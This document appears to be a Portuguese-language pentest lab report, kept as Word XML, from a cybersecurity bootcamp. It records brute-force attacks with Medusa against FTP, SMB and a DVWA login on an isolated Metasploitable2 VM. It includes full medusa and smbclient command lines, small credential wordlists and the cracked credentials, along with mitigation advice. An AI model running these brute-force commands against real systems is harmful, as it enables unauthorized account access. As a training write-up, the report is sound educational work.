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RELATÓRIO TÉCNICO DE PENTEST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E74C3C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataques de Força Bruta — FTP · SMB · DVWA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Bootcamp Riachuelo Cybersecurity — DIO  |  Março 2026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Analista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taissocout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05/03/2026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Alvo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Metasploitable2 — 192.168.56.101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CONFIDENCIAL — LABORATÓRIO EDUCACIONAL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74C3C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Sumário Executivo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Alvo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192.168.56.101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Labs Executados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 (FTP · SMB · HTTP)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Credenciais Encontradas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3/3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Severidade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CRÍTICA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Este relatório documenta a execução de três ataques de força bruta contra o Metasploitable2, realizados em ambiente de laboratório isolado como entrega do Bootcamp Riachuelo Cybersecurity na plataforma DIO. Os protocolos testados foram FTP (porta 21), SMB (porta 445) e HTTP via formulário web DVWA (porta 80).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Em todos os três cenários, credenciais válidas foram descobertas com sucesso utilizando a ferramenta Medusa, demonstrando o impacto crítico de senhas padrão, ausência de account lockout e serviços legados sem proteção adequada.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1 — FTP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msfadmin:msfadmin — acesso total ao servidor FTP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2 — SMB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msfadmin:msfadmin — ADMIN$ com acesso administrativo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 3 — DVWA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admin:msfadmin — acesso ao painel web da aplicação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Tempo médio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Lab SMB &lt; 1 segundo | Lab FTP ~1 min | Lab HTTP &lt; 1 segundo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Vetores comuns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Senhas padrão não alteradas + ausência de account lockout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74C3C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Ambiente de Laboratório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000"/>
        <w:gridCol w:w="1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Parrot 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Parrot 6.x — VirtualBox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Atacante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192.168.56.1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Metasploitable2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Ubuntu 8.04 LTS — VirtualBox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Alvo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192.168.56.101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Rede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Host-Only vboxnet0 — 192.168.56.0/24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Isolada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Evidência — IP do Metasploitable2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 comando ifconfig executado diretamente no Metasploitable2 confirmou o IP 192.168.56.101 na interface eth0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5972175" cy="3362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Figura 1 — ifconfig no Metasploitable2 confirmando IP 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E74C3C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Lab 1 — FTP Brute Force (Porta 21)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Protocolo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FTP / Porta 21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 Medusa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-M ftp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COMPROMETIDO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Credencial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msfadmin:msfadmin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Reconhecimento — Scan Nmap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Verificação da porta 21 no alvo para confirmar serviço FTP ativo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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nmap -p 21 192.168.56.101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Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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21/tcp open  ftp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Execução do Ataque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Comando executado para o ataque de brute force FTP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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medusa -h 192.168.56.101 -U wordlists/usuarios.txt -P wordlists/senhas.txt -M ftp -v 6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-h 192.168.56.101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IP do host alvo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-U wordlists/usuarios.txt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Lista de usuários para teste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-P wordlists/senhas.txt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Wordlist de senhas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-M ftp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Módulo FTP do Medusa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-v 6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Verbosidade máxima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3.3 Resultado e Evidência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Linha crítica do output do Medusa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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ACCOUNT FOUND: [ftp] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5972175" cy="3362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Figura 2 — Medusa FTP: credencial msfadmin:msfadmin descoberta com sucesso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3.4 Análise de Risco — FTP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Credenciais trafegam em texto plano — capturáveis via Wireshark/tcpdump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Sem mecanismo de bloqueio por tentativas excessivas (sem account lockout)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Senha padrão msfadmin:msfadmin nunca foi alterada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Protocolo legado — deve ser substituído por SFTP ou SCP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74C3C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Lab 2 — SMB Brute Force (Porta 445)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Protocolo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SMB / Porta 445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 Medusa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-M smbnt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ADMIN$ COMPROMETIDO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Credencial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msfadmin:msfadmin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Reconhecimento — Scan Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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nmap -p 445 192.168.56.101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Resultado confirmado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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445/tcp open  microsoft-ds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Execução do Ataque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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medusa -h 192.168.56.101 -U wordlists/usuarios.txt -P wordlists/senhas.txt -M smbnt -v 6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4.3 Resultado — Credencial e Acesso ADMIN$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Linha crítica do Medusa confirmando acesso administrativo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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ACCOUNT FOUND: [smbnt] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS (ADMIN$ - Access Allowed)]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4.4 Validação — smbclient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Acesso confirmado via smbclient com listagem completa dos compartilhamentos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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smbclient -L //192.168.56.101 -U msfadmin%msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5972175" cy="3362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Figura 3 — smbclient listando compartilhamentos SMB com acesso ADMIN$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print$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Disk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Printer Drivers — acessível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tmp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Disk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oh noes! — diretório temporário exposto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opt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Disk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Compartilhamento adicional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ADMIN$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IPC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Acesso administrativo total confirmado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msfadmin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Disk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Home Directory do usuário acessível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74C3C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Lab 3 — DVWA HTTP Brute Force (Porta 80)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Protocolo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HTTP / Porta 80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 Medusa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-M http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COMPROMETIDO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Credencial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admin:msfadmin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Configuração do DVWA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 DVWA (Damn Vulnerable Web Application) já está incluso no Metasploitable2 e acessível em http://192.168.56.101/dvwa. Para o lab, o Security Level foi configurado como Low para desabilitar proteções adicionais:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5972175" cy="3362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Figura 4 — DVWA com Security Level Low configurado para o lab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Execução do Ataque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Ataque de brute force contra o formulário de login do DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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medusa -h 192.168.56.101 -u admin -P wordlists/senhas.txt -M http \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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-m DIR:/dvwa/login.php -v 6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5.3 Resultado e Evidência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Credencial web descoberta com sucesso:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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ACCOUNT FOUND: [http] Host: 192.168.56.101 User: admin Password: msfadmin [SUCCESS]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5972175" cy="3362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Figura 5 — Medusa HTTP/DVWA: credencial admin:msfadmin encontrada (linha inferior)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5.4 Por que formulários web são vulneráveis?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Sem CAPTCHA — nenhuma distinção entre humano e bot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Sem rate limiting — requisições ilimitadas por segundo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Sem bloqueio de IP após tentativas excessivas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Respostas HTTP diferenciadas revelam sucesso/falha do login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74C3C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Análise de Risco Consolidada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200"/>
        <w:gridCol w:w="1826"/>
        <w:gridCol w:w="2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CVSS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Vetor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Lab 1 — FTP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FTP / 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9.8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Network / Sem Auth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Lab 2 — SMB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SMB / 445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9.8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Network / ADMIN$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Lab 3 — HTTP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HTTP / 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8.8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Network / Web Form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6.1 Vulnerabilidades Identificadas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Senhas Padrão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Credenciais de instalação (msfadmin:msfadmin, admin:password) nunca foram alteradas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Ausência de Lockout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Nenhum dos 3 serviços bloqueia a conta após tentativas falhas consecutivas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FTP Legado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FTP v0.17 transmite credenciais em texto plano — capturáveis por sniffing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SMBv1 Ativo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Versão legada vulnerável a EternalBlue (MS17-010) e variantes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DVWA Sem WAF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Formulário web sem rate limiting, CAPTCHA ou bloqueio por IP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Sem Monitoramento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Nenhum mecanismo de detecção de brute force ativo nos serviços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74C3C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Recomendações de Mitigação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226"/>
        <w:gridCol w:w="23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Medida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Serviços Afetados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🔴 CRÍTICO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Alterar todas as senhas padrão — mínimo 16 caracteres + complexidade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FTP · SMB · Web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🔴 CRÍTICO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Account Lockout após 5 tentativas falhas consecutivas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🟠 ALTO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Desabilitar FTP — migrar para SFTP (porta 22) ou SCP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FTP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🟠 ALTO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Desabilitar SMBv1 — previne EternalBlue (MS17-010)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SMB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🟠 ALTO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Implementar MFA em todos os acessos administrativos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🟡 MÉDIO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CAPTCHA + rate limiting em formulários web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HTTP/Web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🟡 MÉDIO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SIEM com alertas para múltiplas falhas de autenticação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🟡 MÉDIO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Segmentação de rede — SMB/FTP nunca expostos externamente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FTP · SMB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🟢 BAIXO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Auditoria periódica de credenciais fracas ou padrão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Todos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74C3C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Conclusão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Os três laboratórios executados demonstraram com clareza como a combinação de senhas padrão não alteradas e ausência de políticas de bloqueio de conta cria vetores de ataque críticos em protocolos amplamente utilizados (FTP, SMB e HTTP).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 Medusa identificou credenciais válidas em todos os cenários — em alguns casos em menos de 1 segundo — evidenciando a baixa complexidade necessária para comprometer sistemas com estas características em ambiente real.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Do ponto de vista de Blue Team e SOC, este exercício reforça a importância de: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Políticas rigorosas de gerenciamento e rotação de senhas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Account lockout e rate limiting como controles básicos obrigatórios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Desativação de protocolos legados inseguros (FTP, SMBv1)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Monitoramento contínuo de logs de autenticação com alertas SIEM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Segmentação de rede e princípio do mínimo privilégio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="27AE60" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="EAF7EF" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos os laboratórios foram concluídos com sucesso em ambiente isolado e controlado, exclusivamente para fins educacionais no Bootcamp Riachuelo Cybersecurity — DIO.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74C3C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Apêndice — Wordlists e Comandos Completos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A.1 usuarios.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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msfadmin  |  admin  |  user  |  root  |  guest  |  administrator  |  sysadmin  |  test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A.2 senhas.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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msfadmin  |  123456  |  password  |  admin  |  toor  |  root  |  12345  |  letmein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A.3 Linhas Críticas — Output Medusa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FTP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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ACCOUNT FOUND: [ftp] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS]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SMB:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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ACCOUNT FOUND: [smbnt] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS (ADMIN$)]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HTTP/DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2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ACCOUNT FOUND: [http] Host: 192.168.56.101 User: admin Password: msfadmin [SUCCESS]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A.4 Informações do Servidor Alvo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Ubuntu 8.04 LTS (Linux 2.6.24-16)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Samba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v3.0.20-Debian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FTP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vsftpd 2.3.4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DVWA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v1.0.7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Workgroup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WORKGROUP / METASPLOITABLE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74C3C" w:sz="4" w:space="1"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Bootcamp Riachuelo Cybersecurity — DIO | 05/03/2026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74C3C" w:sz="4" w:space="1"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A1A2E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">RELATÓRIO DE PENTEST — Brute Force FTP · SMB · DVWA</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">    |    taissocout    |  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a4379842dcc032b43440adbe63e48e675ac4c1cc.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1dbb3bdb351508c5b9616cafcc505caeda74d4a1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a7c1108cf6dd682b1faf9b44153470b468688f87.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6d8dbccce01e6ee815a6f7cbf00891b20f0cf456.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e22b6331835f6ad959441e323fc6f0369fe33198.png"/><Relationship Id="rId1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2026-03-05T22:13:52.296Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T22:13:52.297Z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